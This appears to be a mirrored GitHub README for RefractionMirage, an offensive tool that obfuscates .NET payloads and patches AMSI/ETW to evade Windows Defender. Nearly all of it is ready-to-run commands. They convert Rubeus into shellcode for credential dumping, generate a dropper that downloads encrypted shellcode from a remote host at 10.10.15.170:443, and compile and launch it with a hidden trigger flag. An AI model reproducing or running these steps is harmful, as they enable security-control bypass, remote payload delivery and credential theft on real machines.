ZumiYumi/RefractionMirage

GitHub: ZumiYumi/RefractionMirage

该工具用于在红队行动中对 .NET payload 进行动态混淆并绕过 Windows Defender 的 AMSI/ETW 检测机制。

Stars: 35 | Forks: 5

# RefractionMirage 远程动态 .NET 混淆器和 AMSI/ETW 补丁工具,用于绕过 Defender ## 1. 安装 ``` git clone https://github.com/ZumiYumi/RefractionMirage ``` ## 2. 运行 Donut ``` donut -i Rubeus.exe -p "dump" -o rubeus.bin ``` ## 3. 运行 Loader 并编译 ``` python refractionmirage.py --binary rubeus.bin --lhost 10.10.15.170 --lport 443 --urlpath rubeus_enc.bin --output dropper.cs # 示例输出 # [+] 加密 shellcode 已保存至 rubeus_enc.bin(请托管此文件) # [+] Dropper 已写入 dropper.cs # [+] 触发参数:--oayvnf # [+] 触发环境变量:ACOOSBOS_MODE=1 # [+] Payload URL:http://10.10.15.170:443/rubeus_enc.bin # [*] 如果使用 Donut,请使用以下命令生成 shellcode: # donut -i -o payload.bin # [*] 在 Windows (x64) 上编译: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /platform:x64 /out:RefractionMirage.exe dropper.cs # [*] 然后运行:RefractionMirage.exe --oayvnf ``` 您可以按照上述说明进行编译,或者直接复制 refractionmirage.cs 并将其粘贴到 Visual Studio 中。 ## 演示 ![til](https://static.pigsec.cn/wp-content/uploads/repos/cas/e7/e7b45c707f9d9d980ee4f209c4b7b41e44710b1149da813dc051e59c53411009.png)
标签:DNS 反向解析, 逆向工具